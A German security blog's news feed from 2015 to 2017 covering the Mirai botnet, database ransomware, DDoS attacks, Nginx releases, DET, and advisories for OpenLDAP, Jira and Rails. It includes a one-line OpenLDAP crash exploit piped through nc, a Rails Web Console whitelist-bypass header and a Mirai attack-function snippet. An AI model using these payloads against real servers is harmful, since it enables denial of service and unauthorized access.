News

Brian Krebs identifiziert Anna-Senpai, den Mirai-Botnet-Autor

2017.01.19

sherlock

Brian Krebs hat höchstwahrscheinlich den Autor des Mirai-Botnetzes, das im Herbst letzten Jahres veröffentlicht wurde und dem mehrere schwerwiegende DDoS-Angriffe zugerechnet werden, identifiziert.

In einem sehr ausführlichen Artikel "Who is Anna-Senpai, the Mirai Worm Author?" fasst er die Ergebnisse hunderter Stunden Recherche zusammen und erzählt eine interessante Geschichte um DDoS, Botnets, Minecraft und Drama.

Wir empfehlen diesen Artikel jedem, der Interesse an den Interna von Botnet-Betreibern hat.

Mini-Spoiler-Alert: Mirai wurde höchstwahrscheinlich vom Chef einer Firma erstellt und betrieben, die DDoS-Schutzlösungen betreibt.




Kompendium über Datenbank-Ransomware

2017.01.18

cookiemonster

Binaryedge hat ein Kompendium veröffentlicht, indem die aktuellen Entwicklungen der "Mongocalypse" verfolgt werden können.

Innerhalb weniger Tagen stieg die Anzahl betroffener MongoDB-Instanzen von 2.000 auf 28.000 und man kann davon ausgehen, dass mittlerweile die überwiegende Mehrzahl offener Datenbanken nicht mehr ganz so offen sind, denn es ist nicht mehr nur MongoDB betroffen, sondern auch ElasticSearch, Redis, Hadoop und Cassandra, wie die Forscher von Binaryedge herausgefunden haben.

Es war nur eine Frage der Zeit, bis die Verschlüsselungstrojaner sich dieses Feld vornehmen.

Referenzen:




DDoS - Der neue Internet-Killer - Podcast mit All About Security

2016.11.08

all about podcasts


In einem Podcast mit Davor Kolaric spricht 8acks CTO Markus Manzke über die aktuellen Entwicklungen im DDoS - Umfeld.

Aus dem Anrisstext:

Someone Is Learning How to Take Down the Internet ++ Mit mehr als einem Terabit pro Sekunde erreichen DDoS-Attacken neue Dimensionen. ++ Angriffe dieser Größenordnung sind sowohl für Carrier als auch für Kunden mehr als eine Herausforderung. ++ Ein genauer Blick zeigt, dass sich solche Angriffe in Zukunft häufen werden und Deutschland nicht davor gefeit ist. ++ "Markus, böse Zungen sagen, das Internet in dieser Dimension zu kappen sei nur ein Vorgeschmack....ein Testlauf gewesen....vor dem absoluten...Stillstand...!" ++ Wann sind wir dran? // TEIL I


Hier gehts zum Podcast




Someone Is Learning How to Take Down the Internet

2016.10.25

game over


Vor dem Hintergrund der massiven DDOS-Angriffe vom letzten Freitag, die zu Ausfällen bei Twitter, Amazon, Ebay, New York Times oder Github führten mehren sich Gerüchte, es könne sich um einen Testlauf gehandelt haben.

outage map

Interessant in diesem Zusammenhang scheint ein Artikel von Bruce Schneier aus dem September 2016 zu sein, der genau dies thematisiert: Someone Is Learning How to Take Down the Internet (Auszüge weiter unten)

In genau dieses Bild passen die seit Mitte des Jahres massiv zunehmenden Botnet-Aktivitäten, die wir in unserer Sensor-Infrastruktur sehen; im September eine verdoppelung der Aktivitäten um, den 15.09. herum, gefolgt von einem massivene Anstieg ab dem 22.10.

outage map

Auszüge aus: "Someone Is Learning How to Take Down the Internet" von Bruce Schneier, 13.09.2016

Over the past year or two, someone has been probing the defenses of the companies that run critical pieces of the Internet. These probes take the form of precisely calibrated attacks designed to determine exactly how well these companies can defend themselves, and what would be required to take them down. We don't know who is doing this, but it feels like a large nation state. China or Russia would be my first guesses.

First, a little background. If you want to take a network off the Internet, the easiest way to do it is with a distributed denial-of-service attack (DDoS). Like the name says, this is an attack designed to prevent legitimate users from getting to the site. There are subtleties, but basically it means blasting so much data at the site that it's overwhelmed. These attacks are not new: hackers do this to sites they don't like, and criminals have done it as a method of extortion. There is an entire industry, with an arsenal of technologies, devoted to DDoS defense. But largely it's a matter of bandwidth. If the attacker has a bigger fire hose of data than the defender has, the attacker wins.

Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they're used to seeing. They last longer. They're more sophisticated. And they look like probing. One week, the attack would start at a particular level of attack and slowly ramp up before stopping. The next week, it would start at that higher point and continue. And so on, along those lines, as if the attacker were looking for the exact point of failure.

The attacks are also configured in such a way as to see what the company's total defenses are. There are many different ways to launch a DDoS attack. The more attack vectors you employ simultaneously, the more different defenses the defender has to counter with. These companies are seeing more attacks using three or four different vectors. This means that the companies have to use everything they've got to defend themselves. They can't hold anything back. They're forced to demonstrate their defense capabilities for the attacker.




Mirai - Senpain - Sourcecode für das aktuell gefährlichste IoT-Botnet veröffentlicht

2016.10.12

Der Sourcecode des Mirai-Botnetzes, das vor kurzem einigen Ruhm für die bis dato größte DDoS-Attacke erntete wurde im Hackerforum veröffentlicht; Mirai ist ähnlich dem BigBrother-DDoS-Botnet, indem es vor allem IoT-Devices als Bots mißbraucht.

Neben dem Quellcode finden sich umfangreiche Anleitungen zum Setup und Betrieb des C&C-Masters und des Loaders (Scanners/Exploiters), mitdem sich weitere Bots finden und in das Botnetz integrieren lassen.

Wir analysieren momentan Quellcode und Funktionen und werden demnächst einen umfassenden Artikel dazu veröffentlichen.

    add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);
    add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);
    add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);
    add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);

    add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);
    add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);
    add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);

    add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip); 
    add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth); 

    //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);
    add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);

Anbei ein Screenshot des gesamten Posts:

mirai-senpai




Online-Test für die aktuelle OpenSSL-Lücke (CVE-2016-2107)

2016.05.04

Filippo Valsorda stellt einen Online-Test zur Verfügung, der TLS-Setups auf die aktuelle OpenSSL-Lücke prüft.

Neben dem Check-as-a-Service steht der Quellcode zur Verfügung, der u.a. ein CLI-Tool enthält

[ usr@sonnendeck :~/] > go run CVE-2016-2107 8ack.de
2016/05/04 21:15:24 Vulnerable: false

[ usr@sonnendeck :~/] > go run CVE-2016-2107 linkedin.com
2016/05/04 21:15:37 Vulnerable: true

CVE-2016-2107-test




How I Hacked Facebook, and Found Someones Backdoor Script

2016.05.03

fb-killer

fb-f2

fb-f4

fb-owa

Einem chinesischer Hacker mit dem Pseudonym "Orange Tsai" ist es gelungen, Remote-Zugriff auf einen Server aus dem Facebook-Netzwerk zu erhalten. Auf der Suche nach lohnenden Zielen für ein Bug-Bounty-Payout fand er eine Appliance unter dem Namen "files.fb.com", die zum Datenaustausch genutzt wurde und eine RCE - Lücke enthielt.

Während des Hacks stieß er auf einen weiteren Eindringling, der ab Juli letzten Jahres Zugriff auf die Appliance hatte und u.a. die Login-Scripte der Appliance dahingehend modifizierte, dass User/Passwort-Kombinationen geloggt und nach aussen transferiert wurden. Da der Zugang zum files.fb.com an AD-Zugangsdaten geknüpft war UND Services OWA (https://mail.thefacebook.com/owa/) von aussen zu erreichen sind, ist die Tatsache der mitgetrackten User/PW-Kombinationen zumindest bedenklich.

Zusätzlich installierte der vorhergehende Einbrecher eine Backdoor, die Zugriff von aussen auf den Server ermöglichte.

Chapeau, Orange!

Referenzen




Nginx 1.10 veröffentlicht: TCP/UDP-Loadbalancing, HTTPv2, dynamische Module

2016.04.29

nginx logo

Nginx hat die mainline Version 1.10 veröffentlicht, die neue Features aus dem 1.9er - Zweig in die stabile Version überführt.

nginx 1.10

Damit stehen jetzt die folgenden Features zur Verfügung:

  • TCP/UDP Stream-Modul: mit diesem Modul sind TCP/UDP - Loadbalancer möglich
  • HTTP/2, Nachfolger des SPDY-Protokolls
  • dynamische Module erlauben es, einzelne Module zu kompilieren und upzudaten
  • SSLv3 wurde komplett deaktiviert

Wir haben die LB - Features seit Mitte letzten Jahres im Einsatz, vor allem die Möglichkeiten der internen allow/deny und limit-Optionen haben uns überzeugt, für eine fache LB-Aufgaben ausschließlich auf Nginx zu setzen.

komplette Feature-Liste des 1.10er - Zweigs

    *) Feature: the ngx_http_perl_module can be built dynamically.

    *) Feature: UDP support in the stream module.

    *) Feature: the "aio_write" directive.

    *) Feature: now cache manager monitors number of elements in caches and
       tries to avoid cache keys zone overflows.

    *) Feature: Huffman encoding of response headers in HTTP/2.
       Thanks to Vlad Krasnov.

    *) Feature: the "worker_cpu_affinity" directive now supports more than
       64 CPUs.

    *) Feature: TCP support in resolver.

    *) Feature: dynamic modules.

    *) Feature: the "auto" parameter of the "worker_cpu_affinity" directive.

    *) Feature: pwritev() support.

    *) Feature: the "include" directive inside the "upstream" block.

    *) Feature: the ngx_http_slice_module.

    *) Feature: the "nohostname" parameter of logging to syslog.

    *) Feature: the "proxy_cache_convert_head" directive.

    *) Feature: the $realip_remote_addr variable in the
       ngx_http_realip_module.

    *) Feature: the ngx_http_v2_module (replaces ngx_http_spdy_module).
       Thanks to Dropbox and Automattic for sponsoring this work.

    *) Feature: the "tcp_nodelay" directive in the stream module.

    *) Feature: multiple "sub_filter" directives can be used simultaneously.

    *) Feature: variables support in the search string of the "sub_filter"
       directive.

    *) Feature: connection limiting in the stream module.

    *) Feature: data rate limiting in the stream module.

    *) Feature: the "backlog" parameter of the "listen" directives of the
       mail proxy and stream modules.

    *) Feature: the "allow" and "deny" directives in the stream module.

    *) Feature: the "proxy_bind" directive in the stream module.

    *) Feature: the "proxy_protocol" directive in the stream module.

    *) Feature: the -T switch.

    *) Feature: the REQUEST_SCHEME parameter added to the fastcgi.conf,
       fastcgi_params, scgi_params, and uwsgi_params standard configuration
       files.

    *) Feature: the $upstream_connect_time variable.


    *) Feature: the "zone" directive inside the "upstream" block.

    *) Feature: the stream module.

    *) Feature: byte ranges support in the ngx_http_memcached_module.
       Thanks to Martin Mlynář.

    *) Feature: shared memory can now be used on Windows versions with
       address space layout randomization.
       Thanks to Sergey Brester.

    *) Feature: the "error_log" directive can now be used on mail and server
       levels in mail proxy.



DET - Data Exfiltration Toolkit

2016.03.30

Paul Sec (Twitter: @PaulWebSec ) von SensePost hat ein Toolkit veröffentlicht, mitdem sich Daten aus Netzwerken herausleiten lassen: DET - Data Exfiltration Toolkit . DET wurde während der BSidesLjubjana im März 2016 präsentiert, die Slides sind verfügbar

Zur Datenübertragung stehen mehrere Rückkanäle zur Verfügung, wahlweise mit XOR-Obfuscation oder Verschlüsselung mittels AES:

Auf der Roadmap stehen weitere Funktionen wie Rückkanäle via Skype, Tor, Gist/Github, FTP oder Steganographie, sowie Kompression.

DET in Aktion:

Server-Side:

asciicast

Client-Side:
asciicast

Referenzen




ElasticZombie unter den Top 10 Alienvault- Blogs in 2015

2016.01.07

otx-logo

best-of

Der Artikel "ElasticZombie Botnet - Exploiting Elasticsearch Vulnerabilities", der im Rhamen unserer Trechnologiepartnerschaft mit AlienVault Anfang Dezember im AlienVault - Blog erschien, wurde in die Top 12 Hitliste für 2015 gewählt.




using nginx + naxsi to fight against the latest Joomla-0-Day and PHP-Object-Injection generally

2015.12.15




Angriffe auf die DNS-Rootserver

2015.12.09



img-src: Joy of Tech

Am 30.11. und 01.12. wurden die Rootserver der DNS Infrastuktur angegriffen. Der Angriff führte in Teilen zum Ausfall der vorgelagerten Infrastruktur, hatte aber keine Auswirkungen auf das Funktionieren der DNS-Infrastuktur ingesamt.

Der Angriff geschah in 2 Wellen mit jeweils mehr als 5 Millionen Queries/Sekunde auf die gesamte DNS-Rootserver-Infrastruktur; das untenstehende Advisory erläutert weitere Details.


SRC: http://root-servers.org/news/events-of-20151130.txt

Root Server Operators                                            rootops 
http://root-servers.org
                                                        December 4, 2015


                          Events of 2015-11-30

Abstract

   On November 30, 2015 and December 1, 2015, over two separate
   intervals, several of the Internet Domain Name System's root name
   servers received a high rate of queries.  This report explains the
   nature and impact of the incident.

   While it's common for the root name servers to see anomalous traffic,
   including high query loads for varying periods of time, this event
   was large, noticeable via external monitoring systems, and fairly
   unique in nature, so this report is offered in the interests of
   transparency.


1.  Nature of Traffic

   On November 30, 2015 at 06:50 UTC DNS root name servers began
   receiving a high rate of queries.  The queries were well-formed,
   valid DNS messages for a single domain name.  The elevated traffic
   levels continued until approximately 09:30 UTC.

   On December 1, 2015 at 05:10 UTC DNS root name servers again received
   a similar rate of queries, this time for a different domain name.
   The event traffic continued until 06:10 UTC.

   Most, but not all, DNS root name server letters received this query
   load.  DNS root name servers that use IP anycast observed this
   traffic at a significant number of anycast sites.

   The source addresses of these particular queries appear to be
   randomized and distributed throughout the IPv4 address space.  The
   observed traffic volume due to this event was up to approximately 5
   million queries per second, per DNS root name server letter receiving
   the traffic.


2.  Impact of Traffic

   The incident traffic saturated network connections near some DNS root
   name server instances.  This resulted in timeouts for valid, normal
   queries to some DNS root name servers from some locations.




rootops                                                         [Page 1]

                          Events of 2015-11-30             December 2015


   Several DNS root name servers were continuously reachable from
   virtually all monitoring stations for the entire duration of the
   incident.

   There are no known reports of end-user visible error conditions
   during, and as a result of, this incident.  Because the DNS protocol
   is designed to cope with partial reachability among a set of name
   servers, the impact was, to our knowledge, limited to potentially
   minor delays for some name lookups when a recursive name server needs
   to query a DNS root name server (e.g. a cache miss).  This would have
   manifested itself as a barely perceptible initial delay in some web
   browsers or other client programs (such as "ftp" or "ssh").

   Visibility of this event came about as a result of health monitoring
   by DNS root name server operators and other monitoring projects
   around the Internet.  Often these are in the form of "strip chart"
   graphics showing response time variance of a periodic simple query
   against some set of servers, including DNS root name servers.  Such
   test traffic may not be indicative of what happens to normal traffic
   or user experience.


3.  Analysis

   This event was notable for the fact that source addresses were widely
   and evenly distributed, while the query name was not.  This incident,
   therefore, is different from typical DNS amplification attacks
   whereby DNS name servers (including the DNS root name servers) have
   been used as reflection points to overwhelm some third party.

   The DNS root name server system functioned as designed, demonstrating
   overall robustness in the face of large-scale traffic floods observed
   at numerous DNS root name servers.

   Due to the fact that IP source addresses can be easily spoofed, and
   because event traffic landed at large numbers of anycast sites, it is
   unrealistic to trace the incident traffic back to its source.

   Source Address Validation and BCP-38 should be used wherever possible
   to reduce the ability to abuse networks to transmit spoofed source
   packets.









rootops                                                         [Page 2]




Debian verbannt ElasticSearch (DSA-3389-1 elasticsearch -- end-of-life)

2015.11.23

In einem Security-Advisory (DSA 3389) gibt Debian bekannt, ElasticSearch nicht weiter als Repo führen zu werden; als Grund wird die mangelnde Bereitschaft von seitens Elastic.co angeführt, Security-Advisories zur Verfügung zu stellen; dies macht ein Backporting von Security-Fixes unmöglich.

Security support for elasticsearch in jessie is hereby discontinued. The project no longer releases information on fixed security issues which allow backporting them to released versions of Debian and actively discourages from doing so.

elasticsearch will also be removed from Debian stretch (the next stable Debian release), but will continue to remain in unstable.




Google stellt auf BoringSSL um

2015.10.22

boringssl

Google hat die komplette Infrastruktur (Server & Services) und Codebasis (Chromium, Android) von OpenSSL auf BoringSSL umgestellt; in einem ausführlich Artikel erklären Adaml Langley und David Benjamin weitere Details:

We recently switched Google's two billion line repository over to BoringSSL, our fork of OpenSSL. This means that BoringSSL is now powering Chromium (on nearly all platforms), Android M and Google's production services. For the first time, the majority of Google's products are sharing a single TLS stack and making changes no longer involves several days of work juggling patch files across multiple repositories.

Referenz:




SYNful Knock - weltweite Scans

2015.09.21

synful knock scans globale Verteilung kompromittierter Cisco-Router, (c) copyright ShadowServer.org

Am 15. September hat FireEyey einen Report zu potentiell kompromittierten Cisco-Routern veröffentlicht, auch bekannt als "SYNful Knock"

Im Laufe der letzten Tage haben verschiedene Projekte (shadowserver.org, zmap.io) das Internet nach Routern gescannt, die auf entsprechenden Anfragen reagieren.

Die ShadowServer - Scans haben 119 potentiell verwundbare Router ergeben, Zmap hat 79 gefunden:

The implant is fingerprintable and we are able to scan for infected servers without invoking the vulnerability by modifying ZMap to send the specially crafted TCP SYN packets. We completed four scans of the public IPv4 address space on September 15, 2015 and found 79 hosts displaying behavior consistent with the SYNful Knock implant. These routers belong to a range of institutions in 19 countries. We have found no immediate pattern in the organizations affected, but note a surprising number of routers in Africa and Asia (compared to IP allocations). We note that the 25 hosts in the United States belong to a single service provider on the East Coast, and that the hosts in both Germany and Lebanon belong to a single satellite provider that provides coverage to Africa.

Die beiden Tabellen zeigen die jeweiligen Scanergebnisse:

tabelle-zmap.io Scanergebnisse zmap.io


tabelle-shadownserver

Scanergebnisse shadowserver

Referenzen




Lücke in OpenLDAP erlaubt Single-Packet-DoS

2015.09.18

Auf der FD-Mailinglist wurde ein Advisory veröffentlicht, indem vor einer DoS-Lücke im OpenLDAP - Server gewarnt wird: ein Angreifer kann mit einem einzigen Paket den OpenLDAP - Server zum Absturz bringen; eine Authentifizierung ist nicht notwendig.

Praktischerweise liefert das Advisory den passenden Exploit gleich mit:

echo "/4SEhISEd4MKYj5ZMgAAAC8=| base64 -d | nc -v 127.0.0.1 389

BOOM HEADSHOT

Updates stehen für die gängigen Distributionen bereit.




Bypass WAF Cookbook

2015.09.03

src: Bypass WAF Cookbook @ wyoon


Im DROPS-Blog wurde ein umfangreiches "Bypass WAF Cookbook" veröffentlich, indem aktuelle Szenarien und Methoden erwähnt werden, um WebApplicationFirewalls zu umgehen; neben den "üblichen Verdächtigen" wie %Unicode, Double encoding, oder Whitespace-Injection werden auch Methoden wie HTTP Parameter Pollution, Bypass via Whitelists, Bypass bei hoher CPU-Last oder Bypass durch Umgehen von Boundary-Checks angesprochen.

Das Handbuch ist ein solides Werk, um die eigene WAF-Installation gegen bekannte und allgemein genutzte Bypass-Techniken zu prüfen.


waf-bypass


src: Bypass WAF Cookbook @ wyoon




HipChat for Jira Remote Code Execution

2015.09.03

  • src: JIRA and HipChat for JIRA plugin Security Advisory 2015-08-26
  • Date of Advisory: 26/August/2015 (UTC)
  • CVE ID: CVE-2015-5603
  • Product: JIRA and the HipChat for JIRA plugin.
  • Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
  • Affected JIRA product versions: 6.3.5 <= version < 6.4.11
  • Login/Authentication required: yes

Summary of Vulnerability

This advisory discloses a critical severity security vulnerability that was introduced in version 1.3.2 of the HipChat for JIRA plugin. Versions of the HipChat for JIRA plugin starting with 1.3.2 before 6.30.0 (the fixed version) are vulnerable. Vulnerable versions of the HipChat for JIRA plugin were bundled by default with JIRA since JIRA version 6.3.5, up to but not including 6.4.11 (the fixed version).

Atlassian Cloud instances have already been upgraded to a version of the HipChat for JIRA plugin which does not have the issue described on this page. Customers who have updated the HipChat For JIRA plugin to version 6.30.0 or higher are not affected. Customers who have downloaded and installed JIRA >= 6.3.5 < 6.4.11 and have not updated the HipChat For JIRA plugin to 6.30.0 or higher should either update those instances of the HipChat For JIRA plugin for their JIRA installations in order to fix this vulnerability. Customers who have installed the HipChat For JIRA plugin in JIRA, and are running a version of the plugin equal to or above 1.3.2 and less than 6.30.0 should either update those instances of the HipChat For JIRA plugin or their JIRA installations to fix this vulnerability.

Severity:

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels (https://www.atlassian.com/security/security-severity-levels). The scale allows us to rank a severity as critical, high, moderate, or low. This is an independent assessment and you should evaluate its applicability to your own IT environment.

Description:

We internally discovered that the HipChat For JIRA plugin had a resource that combined user input into a velocity template source and subsequently rendered it. Authenticated attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of the HipChat For JIRA plugin enabled. To exploit this issue attackers need to be able to access the JIRA web interface and log into JIRA.

All versions of HipChat For JIRA plugin from 1.3.2 before 6.30.0 are affected by this vulnerability.

All versions of JIRA from 6.3.5 before 6.4.11 are affected by this vulnerability. This issue can be tracked here: https://jira.atlassian.com/browse/JRA-44831

Fix:

We have taken the follow steps to address this issue: Released a new version, 6.30.0, of the HipChat For JIRA plugin Released JIRA version 6.4.11 that updates the bundled copy of the HipChat For JIRA plugin to a fixed version.

Remediation:

Upgrade the HipChat for JIRA plugin to version 6.30.0 or higher. For instructions on how to update add-ons like the HipChat For JIRA plugin see https://confluence.atlassian.com/display/UPM/Updating+add-ons. Optionally upgrade JIRA to version 6.4.11 which bundles a fixed version of the HipChat For JIRA plugin.

Risk Mitigation:

If you are unable to upgrade your JIRA server or the HipChat for JIRA plugin, then as a temporary workaround, you can disable or uninstall the HipChat For JIRA plugin in JIRA.

Support:

If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/ .


Read more in the official Advisory: JIRA and HipChat for JIRA plugin Security Advisory 2015-08-26




NGINX - Buch von O'Reilly als freie Version verfügbar

2015.07.31

Igor Sysoev hat auf der Nginx-Mailingliste ein neues Nginx-Buch von O'Reilly angekündigt: "nginx: A Practical Guide to High Performance"; als Goodie steht die Preview-Edition als freier Download auf nginx.com zur Verfügung.

Nearly 20 years ago I read my first O’Reilly book, Learning Perl. Back then I never would have dreamed O’Reilly would someday publish a book written about the software I created, yet here we are today.

I am honored to announce that later this year O’Reilly Media will publish one of their iconic animal books entitled nginx: A Practical Guide to High Performance, and I’m delighted to offer you a preview edition download today. This five chapter preview covers:

  • How to install nginx
  • How to use nginx as a software load balancer
  • How to set up nginx as a reverse proxy for serving dynamic web applications
  • How to tune nginx for optimal performance and security
  • And more!

I hope you enjoy the book.

Igor Sysoev




Nginx 1.9.3 mit neuen Stream-Features

2015.07.14

Das Nginx - Team hat Version 1.9.3 veröffentlicht und baut die Funktionalitäten des im 1.9er-Zweig eingeführten Stream-Moduls weiter aus; mit dem Stream-Modul lässt sich Nginx als reiner TCP-Loadbalancer betreiben. In einem Artikel werden verschiedene Einsatzszenarien erläutert.

Nachdem die Stream-Funktionalitäten in der Version 1.9.0 grundsätzlich zur Verfügung standen, kamen in den nachfolgenden Versionen IP-basierte Access-Kontrolle hinzu (allow/deny). In der neuen Version

Das Stream-Modul bietet jetzt weitere Features, um die Zugriffe zu kontrollieren: connection limiting und data rate limiting stehen jetzt zur Verfügung.

Für das LoadBlancing kann man im Stream-Modul verschiedene Methoden wählen:

  • least_conn - der upstream-Searver mit den wenigsten Verbindungen wird ausgewählt
  • least_time - der upstream-Server mit der schnellsten Verbindungszeit wird ausgewählt
  • hash - garantiert IP-basierte Stickyness
user nginx;
worker_processes        auto; # num of procs


events {
    worker_connections  1024;
}

pid /var/run/nginx/nginx.pid;



stream {
    upstream udx_backend {

        least_conn;     
        server udx1.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx2.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx3.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx4.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx5.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx6.srv.my:2342 max_fails=3 fail_timeout=10s backup;


    }



    server {

        allow 192.168.12.1/24;
        allow 127.0.0.1;
        deny 192.168.12.12;
        deny all;  



        listen     2342;
        proxy_pass udx_backend;
    }

}



RAILS IP Whitelist Bypass and Remote Code Execution (CVE-2015-3224)

2015.06.18

Die in Ruby on Rails 4.2 eingeführte Console hat einen fundamentalen Fehler, mit dem ein Angreifer jegliche IP-Restriktionen umgehen kann; publiziert wurde die Lücke von @joernchen:

However with Rails Versions 4.1 and 4.0 the Web Console built in IP whitelist is bypassable. This is due to the fact that Web Console parses the request.remote_ip to check if the IP is whitelisted with the Ruby class IPAddr.

Due to this parser differential an attacker might bypass the Web Console IP whitelist by supplying a HTTP header value of:

X-Forwarded-For: 0000::1

Updates stehen bereit und sollten eingespielt werden, wenn die Console zum Einsatz kommt.

Grundsätzlich wird empfohlen, die Rails-Console nur in Entwicklungs- und nicht in Livesystemen einzusetzen.

Referenzen




New LibreSSL mailing lists

2015.06.04

Das OpenSSL-Team hat 2 neue Mailinglisten eingerichtet, um Diskussionen rund um das LibreSSL-Projekt eine eigene Plattform zu geben. Neben der ML libressl@openbsd.org für allgemeine und technische Belange wude auch die ML libressl-security@openbsd.org eingerichtet, um Bugs und Probleme an die Entwickler zu melden.

original-nachricht @ misc@openbsd.org

We have two new lists for LibreSSL:

libressl@openbsd.org - public list for technical discussion about
LibreSSL on any operating system.

libressl-security@openbsd.org - private list for reporting severe
vulnerabilities in OpenSSL or LibreSSL to the core LibreSSL team.


See http://www.openbsd.org/mail.html for more details.



SSLLabs stuft Server mit schwachen DH-Parametern herunter

2015.05.21

SSLLabs bewertet seit heute, den 21.05.2015, Server mit schwachen (<2048 bit) DH-Parametern mit "B" und stuft damit Server, die potentiell anfällig für die Logjam-Lücke sind, herunter.

Aus dem Blogpost:

Weak DH Parameters

Even though for most sites there isn't an immediate vulnerability if they're using 1024-bit DH parameters (state attacks are not part of most sites' threat model), such parameters are weak and should be discouraged. We have been warning about weak DH parameters for a long time; now, with the announcement of Logjam, we feel that it's a good time to move one step further. As of yesterday, sites that continue to use weak DH parameters are capped at B.

dh-1

dh-1




A Javascript-based DDoS Attack as seen by Safe Browsing (GitHubs GreatDDoS)

2015.04.25

Google's SafeBrowsing - Team analysiert jeden Monat Millionen Webseiten, um Sie auf Schadcode, Exploits, Injections und andere, für User gefährliche Inhalte zu untersuchen.

Ende März kam es zu einem massiven DDoS-Angriff auf GitHub, der die Seite tagelang lahmlegte. Nach kurzer Zeit wurde der Grund für den DDoS gefunden: zufällig ausgewählten Besuchern chinesischer Webseiten wurde JavaScript - Code untergeschoben, der den Browser veranlasste, ausgewählte Seiten von GitHub aufzurufen. Die schiere Masse sorgte dann für einen DDoS gegen Github.

Das SafeBrowsing-team hat diese Injections auch beobachtet und in einem Artikel ausgewertet:

In the middle of March, several sources reported a large Distributed Denial-of-Service attack against the censorship monitoring organization GreatFire. Researchers have extensively analyzed this DoS attack and found it novel because it was conducted by a network operator that intercepted benign web content to inject malicious Javascript. In this particular case, Javascript and HTML resources hosted on baidu.com were replaced with Javascript that would repeatedly request resources from the attacked domains.

While Safe Browsing does not observe traffic at the network level, it affords good visibility at the HTTP protocol level. As such our infrastructure picked up this attack, too. Using Safe Browsing data, we can provide a more complete timeline of the attack and shed light on what injections occurred when.

js-injection during the GreatDDOS

Referenzen




SSLLabs veröffentlicht CLI-Client für die SSLLabs-API

2015.03.17

sslllabs

SSLLabs hat einen GO-basierten Client für die vor kurzem veröffentlichte SSLLabs-API auf GitHub zur Verfügung gestellt, mitdem sich einzelne Host oder eine Liste mit Hosts scannen lassen und der Output wiederum via JSON in eine Datenbank importiert werden kann. Das enstprechende Datenbankschema, dem auch SSL Pulse zugrundeliegt, wurde mit veröffentlicht.

Die Lizenzbedingungen für die Nutzung der API sind etwas restriktiv: so ist es zwar erlaubt, eine beliebige Anzahl von Servern zu scannen, die dem eigene Zugriff unterliegen, es ist aber nicht erlaubt, die API z.B. in Produkte einzubauen und damit die SSLLabs-Ergebnisse über dritte anzubieten.




Farewell, Google-Code, and thanx for all the fish

2015.03.12

google code logo

Google-Code, die Code-Hosting Plattform von Google, schließt zum Januar 2016 die Pforten. Bereits zum heutigen 12.03. können keine neuen Projekte mehr angelegt werden, ab August 2015 werden alle Repos Read-Only erreichbar sein, und ab Januar bis Ende 2016 nur noch archivierte Downloads möglich sein.

In einem Blogpost weist das Google-Team auf die Anderungen hin, gibt Migrationshinweise zu Github oder Bitbucket und empfiehlt, existierenden Projekte die "This Projekt moved" - Funktion zu nutzen, um Deep-Links auch weiterhin verfügbar zu halten; Links auf das Projekt bei Google-Code werden dann in Redirects auf das neue Projekt umgesetzt.

Referenzen




Is Google about to tell the world that your site is too slow? (via nccgroup)

2015.03.12




Rowhammer - FAQ für Serverbetreiber

2015.03.10

Das Project Zero-Team von Google hat über eine Möglichkeit berichtet, durch Bitflips erweiterte Zugriffsmöglichkeiten auf Linux- und OSX-Computern zu erlangen. Robert Graham hat in einem Blogpost kurze Zusammenfassung des Bugs zusammengetragen,

Wir veröffentlichen hier ein kurzes FAQ für Serverbetreiber mit den wichtigsten Fragen und Antworten

  • Ist die Lücke von aussen auf Servern ausnutzbar? - Nein. Zum Ausnutzen der Lücke ist lokaler Zugriff notwendig, da in kurzer Zeit direkt adressierte Speicherbereiche ausgelesen werden müssen.

  • Schützt ECC-RAM vor der Lücke? - Vielleicht, vielleicht auch nicht. ECC-RAM ist in der Lage, einzelne Bitflips zu erkennen und zu reparieren. Wenn ein Angreifer es schafft, 2 Bits gleichzeitig zu manipulieren bleibt der betroffene Prozess im günstigsten Fall stehen (DoS), bei 3 gleichzeitige Bitflips können von ECC-RAM u.U. nicht entdeckt werden.

  • Sind virtuelle Machinen von der Lücke betroffen? - Bisher gibt es keine Berichte draüber, dass von einer virtuellen Maschine auf eine andere oder den Hypervisor zugegriffen werden kann, da durch den Hypervisor ein anderes Memory-Mapping geschieht und der Speicher nicht direkt in die virtuellen Maschine hineingemappt wird:

    Unlike operating systems, hypervisors don't expose the physical mapping to the virtual machines. The upshot of this is that people running VMs in the cloud do not have to worry about other customers using this technique to hack them. It's probably not a concern anyway, since most cloud systems use error correcting memory, but the VM translation makes it extra hard to crack robert graham

  • Ist die Lücke für lokale User einfach ausnutzbar? - Abhänging von der verwendeten Hardware hat das Google-Team auf 50% der getesteten Notebooks einen Weg gefunden, die Lücke auszunutzen; Reddit-User berichten von 3 Minuten bis 3h, die der rowhammer-poc laufen musste, um Bitflips zu erzeugen. Im Zweifel sollte die Antwort also "Ja, die Lücke ist einfach ausnutzbar" heißen, vor allem auch in Hinblick auf die Unsicherheiten bezüglich ECC_RAM.

  • Gibt es mögliche Mitigations? - Von Cisco werden - Mitigations beschrieben, die aber von speziellen Chipsätzen und damit Hardware abhängig sind:

